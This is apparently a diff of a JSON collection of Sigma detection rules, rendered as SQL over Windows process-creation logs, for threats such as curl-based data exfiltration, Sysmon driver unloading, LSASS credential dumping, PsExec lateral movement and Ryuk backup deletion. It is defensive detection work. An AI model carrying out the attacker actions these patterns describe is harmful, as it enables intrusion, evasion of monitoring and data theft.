'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_defaultpack.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", - "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Suspicious Child Process Created as System", + "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "status": "test", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1134.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", + "title": "PsExec Service Execution", + "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "status": "experimental", + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" + "attack.execution" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Legitimate administrative tasks" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_sysinternals_psexesvc.yml" }, { "title": "PUA - NirCmd Execution As LOCAL SYSTEM", @@ -11988,339 +11859,363 @@ "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "status": "test", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "falsepositives": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_renamed_paexec.yml" + }, + { + "title": "Msiexec Quiet Installation", + "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Unlikely" + "WindowsApps installing updates via the quiet flag" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_msiexec_install_quiet.yml" }, { - "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", - "id": "47e4bab7-c626-47dc-967b-255608c9a920", + "title": "Arbitrary File Download Via MSPUB.EXE", + "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "status": "experimental", - "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_recon_everyone.yml" + "filename": "proc_creation_win_lolbin_mspub_download.yml" }, { - "title": "Potential Data Exfiltration Via Curl.EXE", - "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_fileupload.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "title": "Potential Binary Impersonating Sysinternals Tools", + "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "status": "experimental", + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "author": "frack113", "tags": [ "attack.execution", "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\portmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regjump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "status": "test", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": 